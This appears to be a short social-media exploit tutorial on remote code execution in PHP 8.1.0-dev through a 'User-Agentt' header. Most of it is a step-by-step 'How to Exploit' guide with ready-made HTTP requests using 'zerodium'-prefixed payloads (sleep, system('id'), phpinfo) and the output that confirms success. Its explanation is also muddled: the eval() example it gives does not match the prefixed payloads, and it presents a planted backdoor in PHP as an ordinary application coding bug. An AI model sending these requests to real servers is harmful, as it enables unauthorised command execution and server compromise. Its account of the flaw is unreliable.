PHP 8.1.0-dev RCE via User-Agentt Exploit

Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.


How Does the Vulnerability Work?
The vulnerability occurs when the application uses

$_SERVER['HTTP_USER_AGENTT']

unsafely, especially if the value is passed to functions like eval() or system().

If input validation is not implemented, attackers can execute unauthorized commands directly on the server.


Example of Vulnerable PHP Code

<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>

Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.

How to Exploit the Vulnerability

1. Testing Delay with sleep()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);

•If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.

2. Executing a System Command

with system()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');

•If the server responds with user information such as:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

•this means RCE exploitation is successful.

3. Executing PHP via phpinfo()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();

•This might display the current PHP configuration, which helps in understanding the target environment.

Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.

#ExploitQuest #ExploitQuest

@ExploitQuest